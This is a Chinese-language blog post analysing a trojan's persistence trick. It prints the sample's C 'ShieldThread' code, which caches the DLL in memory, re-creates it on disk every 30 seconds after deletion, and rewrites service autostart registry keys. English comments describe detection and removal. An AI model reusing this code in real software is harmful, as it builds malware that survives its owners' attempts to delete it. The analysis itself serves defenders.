解析木馬復活技術-程序被刪還會還原

我在無聊之中看到一款源碼,下載下來看以後發現程序會創建一個ShieldThread線程

跟蹤下去發現它會把自身讀取到一個分配的內存空間,然後每隔一段時間判斷自身文件是否存在

如果不存在就從內存中寫出文件。具體代碼如下

//

// Self-repair ("shield") thread of the analysed sample: it caches a copy of its own
// DLL image in memory once, then every 30 seconds re-creates the file on disk if it
// has been deleted and re-asserts the service registry entries that load it.
// lpParamter is unused. Returns 0 only if the infinite loop is left via an
// exception (the __finally block runs on that path).
//
// Defender notes: deleting the file alone does not remove the implant while the
// hosting process is alive, because the image is re-written from MemDll. The
// observable pattern is a periodic FindFirstFile on the module's own path followed,
// on a miss, by CreateFile(CREATE_ALWAYS)/WriteFile of a DLL, plus repeated writes
// to HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Start and
// ...\Parameters\ServiceDll (layout consistent with an svchost-hosted service DLL).
// Stop the hosting service / terminate the process before removing the file and
// the registry keys, and alert on ServiceDll modifications by non-installer processes.
DWORD WINAPI ShieldThread(LPVOID lpParamter)
{
 char   DllFilePath[MAX_PATH];          // full path of this DLL (filled by GetModuleFileName)
 HANDLE hDllFile;
 HANDLE hSearch;
 void*  MemDll;                         // in-memory copy of the DLL image, kept for the thread's lifetime
 int    SizeDll;
    DWORD  BytesRead;
 WIN32_FIND_DATA  FileData;
    char   ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];   // Services\<name> and Services\<name>\Parameters
    char * SubRoot="SYSTEM\\CurrentControlSet\\Services\\";
   
 __try
 { 
  ShieldFlag = 1;                       // global (defined elsewhere) signalling the guard thread is active
  // Build the two registry subkey paths from the configured service name.
  strncpy(ProtectKey1,SubRoot,sizeof(ProtectKey1));
     strncat(ProtectKey1,ServerCFG.ServiceName,sizeof(ProtectKey1)); 
     strncpy(ProtectKey2,ProtectKey1,sizeof(ProtectKey2));
     strncat(ProtectKey2,"\\Parameters",sizeof(ProtectKey2));
     GetModuleFileName(HMODULE(hDll), DllFilePath,MAX_PATH);   // hDll: this DLL's module handle, set elsewhere

     // One-time snapshot of the DLL from disk into a writable allocation; no return
     // value of CreateFile/GetFileSize/VirtualAlloc/ReadFile is checked.
     hDllFile =CreateFile(DllFilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
     SizeDll  =GetFileSize(hDllFile,0);
     MemDll   =VirtualAlloc(0,SizeDll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
        ReadFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
     CloseHandle(hDllFile);
   
     while(1)   // never exits normally; the thread lives as long as the host process
  {
    
   // Probe for our own file; INVALID_HANDLE_VALUE means it is gone (deleted or renamed).
   hSearch =FindFirstFile(DllFilePath,&FileData);
         if(hSearch==INVALID_HANDLE_VALUE)
   {         
    // Restore the file from the cached image (share mode 0 = exclusive while writing).
    hDllFile=CreateFile(DllFilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                WriteFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
          CloseHandle(hDllFile);
   } 
   FindClose(hSearch);   // note: also called when hSearch is INVALID_HANDLE_VALUE
         // Re-assert service autostart and the ServiceDll path on every iteration, whether
         // or not they changed. WriteRegEx is a project helper whose argument semantics are
         // not visible here; the 2 for "Start" presumably is SERVICE_AUTO_START — TODO confirm.
         WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey1,"Start",REG_DWORD,NULL,2,1);
      WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey2,"ServiceDll",REG_EXPAND_SZ,DllFilePath,NULL,0);
      Sleep(30000);   // 30 s interval: the window between a deletion and its restoration
  }
 }
 __finally
 {
  // Reached only if an exception leaves the __try block. The handles may already
  // have been closed inside the loop, so these calls can act on stale handle values.
  CloseHandle(hDllFile);
  FindClose(hSearch);
 }
 return 0;
}
